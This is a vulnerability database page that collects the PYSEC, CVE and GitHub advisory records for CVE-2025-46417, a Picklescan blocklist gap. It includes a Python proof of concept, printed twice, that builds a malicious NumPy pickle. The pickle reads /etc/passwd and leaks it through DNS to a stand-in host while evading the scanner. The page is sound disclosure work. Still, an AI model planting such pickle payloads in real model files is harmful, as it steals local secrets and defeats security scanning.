pysec-2025-34

Vulnerability from pysec

Published

2025-04-24 01:15

Modified

2025-04-24 03:08

Details

The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.

Impacted products

Name	purl
picklescan	pkg:pypi/picklescan

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan",
        "purl": "pkg:pypi/picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.0.1",
        "0.0.10",
        "0.0.11",
        "0.0.12",
        "0.0.13",
        "0.0.14",
        "0.0.15",
        "0.0.16",
        "0.0.17",
        "0.0.18",
        "0.0.19",
        "0.0.2",
        "0.0.20",
        "0.0.21",
        "0.0.22",
        "0.0.23",
        "0.0.24",
        "0.0.3",
        "0.0.4",
        "0.0.5",
        "0.0.6",
        "0.0.7",
        "0.0.8",
        "0.0.9"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46417",
    "GHSA-93mv-x874-956g"
  ],
  "details": "The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.",
  "id": "PYSEC-2025-34",
  "modified": "2025-04-24T03:08:15.436691+00:00",
  "published": "2025-04-24T01:15:49+00:00",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-93mv-x874-956g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/40"
    }
  ]
}

CVE-2025-46417 (GCVE-0-2025-46417)

Vulnerability from cvelistv5

Published

2025-04-24 00:00

Modified

2025-04-24 14:51

Severity ?

6.8 (Medium) - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE

CWE-184 - Incomplete List of Disallowed Inputs

Summary

The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.

References

URL

Tags

	https://github.com/advisories/GHSA-93mv-x874-956g
	https://github.com/mmaitre314/picklescan/pull/40

Impacted products

	Vendor	Product	Version
	Picklescan	Picklescan	Version: 0 ≤

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-46417",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-24T14:50:58.816506Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-24T14:51:19.232Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/advisories/GHSA-93mv-x874-956g"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Picklescan",
          "vendor": "Picklescan",
          "versions": [
            {
              "lessThan": "0.0.25",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184 Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-04-24T00:27:33.032Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://github.com/advisories/GHSA-93mv-x874-956g"
        },
        {
          "url": "https://github.com/mmaitre314/picklescan/pull/40"
        }
      ],
      "x_generator": {
        "engine": "enrichogram 0.0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2025-46417",
    "datePublished": "2025-04-24T00:00:00.000Z",
    "dateReserved": "2025-04-24T00:00:00.000Z",
    "dateUpdated": "2025-04-24T14:51:19.232Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

ghsa-93mv-x874-956g

Vulnerability from github

Published

2025-04-07 18:52

Modified

2025-04-24 16:02

Severity ?

7.1 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Summary

Picklescan Vulnerable to Exfiltration via DNS via linecache and ssl.get_server_certificate

Details

Summary

Picklescan does not detect malicious pickles that exfiltrate sensitive information via DNS after deserialization.

Details

picklescan’s blacklist can be bypassed to exfiltrate sensitive information (like file contents, secrets, or credentials) during model deserialization by leveraging ssl.get_server_certificate as the callable function in the pickle payload. Since ssl is a standard Python library used for legitimate TLS operations, it is rarely blacklisted by static scanners or runtime monitors.

The payload avoids flagged modules and instead uses linecache (also unflagged) to read local files. The exfiltrated data is added to DNS-safe chunks, and embedded as subdomains in a crafted FQDN. When passed to ssl.get_server_certificate, the Python runtime performs a DNS resolution to the attacker-controlled domain, leaking the encoded content.

The payload executes the following steps:

Reads sensitive local file content using linecache module
Encodes the data for DNS exfiltration
Constructs a malicious domain name using a third party service dnslog.cn
Triggers a DNS resolution via ssl.get_server_certificate
Leaks the encoded file content to the attacker

PoC

Before running the PoC change the fqdn to your own or a third party that you control. In this PoC we used fqdn = f"{subdomain}.ctmc2q.dnslog.cn".

```python

import numpy as np

def create_malicious_model():

Define the payload class

class DNSLogPayload:
    def __reduce__(self):
        # Step 1: read a line from /etc/passwd
        linecache = __import__("linecache")
        first_line = linecache.getline("/etc/passwd", 1).strip()

        # Step 2: Sanitize and embed it as a DNS subdomain
        subdomain = first_line.replace(":", "_").replace("/", "_")
        fqdn = f"{subdomain}.dns-logger.invalid"

        # Step 3: Use ssl.get_server_certificate to trigger DNS resolution
        ssl_mod = __import__("ssl")
        return (getattr(ssl_mod, "get_server_certificate"), ((fqdn, 443),))

# Wrap the payload in a NumPy object array
arr = np.array([DNSLogPayload()], dtype=object)

# Save to .npy file
np.save("dnslog_trigger_payload.npy", arr, allow_pickle=True)

def load_model(model): try: return np.load(model, encoding="latin1", fix_imports=True, allow_pickle=1) except Exception: raise ValueError("Invalid file")

if name == "main": create_malicious_model() model = "dnslog_trigger_payload.npy" print("[i] Loading and executing the model") data = load_model(model)

```

Impact

Evade detection: Bypasses the latest version of picklescan's blacklist.
Exfiltrate sensitive local files to an attacker controlled DNS

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46417"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-07T18:52:47Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nPicklescan does not detect malicious pickles that exfiltrate sensitive information via DNS after deserialization.\n\n\n### Details\n\npicklescan\u2019s blacklist can be bypassed to exfiltrate sensitive information (like file contents, secrets, or credentials) during model deserialization by leveraging `ssl.get_server_certificate` as the callable function in the pickle payload. Since `ssl` is a standard Python library used for legitimate TLS operations, it is rarely blacklisted by static scanners or runtime monitors.\n\nThe payload avoids flagged modules and instead uses `linecache` (also unflagged) to read local files. The exfiltrated data is added to DNS-safe chunks, and embedded as subdomains in a crafted FQDN.  When passed to `ssl.get_server_certificate`, the Python runtime performs a DNS resolution to the attacker-controlled domain, leaking the encoded content.\n\nThe payload executes the following steps:\n\n- Reads sensitive local file content using `linecache` module\n- Encodes the data for DNS exfiltration\n- Constructs a malicious domain name using a third party service `dnslog.cn` \n- Triggers a DNS resolution via `ssl.get_server_certificate`\n- Leaks the encoded file content to the attacker\n\n### PoC\n\nBefore running the PoC change the `fqdn` to your own or a third party that you control. In this PoC we used ` fqdn = f\"{subdomain}.ctmc2q.dnslog.cn\"`.\n\n```python\n\nimport numpy as np\n\ndef create_malicious_model():\n# Define the payload class\n    class DNSLogPayload:\n        def __reduce__(self):\n            # Step 1: read a line from /etc/passwd\n            linecache = __import__(\"linecache\")\n            first_line = linecache.getline(\"/etc/passwd\", 1).strip()\n\n            # Step 2: Sanitize and embed it as a DNS subdomain\n            subdomain = first_line.replace(\":\", \"_\").replace(\"/\", \"_\")\n            fqdn = f\"{subdomain}.dns-logger.invalid\"\n\n            # Step 3: Use ssl.get_server_certificate to trigger DNS resolution\n            ssl_mod = __import__(\"ssl\")\n            return (getattr(ssl_mod, \"get_server_certificate\"), ((fqdn, 443),))\n\n    # Wrap the payload in a NumPy object array\n    arr = np.array([DNSLogPayload()], dtype=object)\n\n    # Save to .npy file\n    np.save(\"dnslog_trigger_payload.npy\", arr, allow_pickle=True)   \n\ndef load_model(model):\n    try:\n        return np.load(model, encoding=\"latin1\", fix_imports=True, allow_pickle=1)\n    except Exception:\n        raise ValueError(\"Invalid file\")\n\nif __name__ == \"__main__\":\n    create_malicious_model()\n    model = \"dnslog_trigger_payload.npy\"\n    print(\"[i] Loading and executing the model\")\n    data = load_model(model)\n \n```\n\n### Impact\n\n1. Evade detection: Bypasses the latest version of picklescan\u0027s blacklist. \n2. Exfiltrate sensitive local files to an attacker controlled DNS",
  "id": "GHSA-93mv-x874-956g",
  "modified": "2025-04-24T16:02:36Z",
  "published": "2025-04-07T18:52:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-93mv-x874-956g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/40"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-34.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan Vulnerable to Exfiltration via DNS via linecache and ssl.get_server_certificate"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

pysec-2025-34

Vulnerability from pysec

CVE-2025-46417 (GCVE-0-2025-46417)

Vulnerability from cvelistv5

ghsa-93mv-x874-956g

Vulnerability from github

Summary

Details

PoC

Define the payload class

Impact

Tags

Sightings

Nomenclature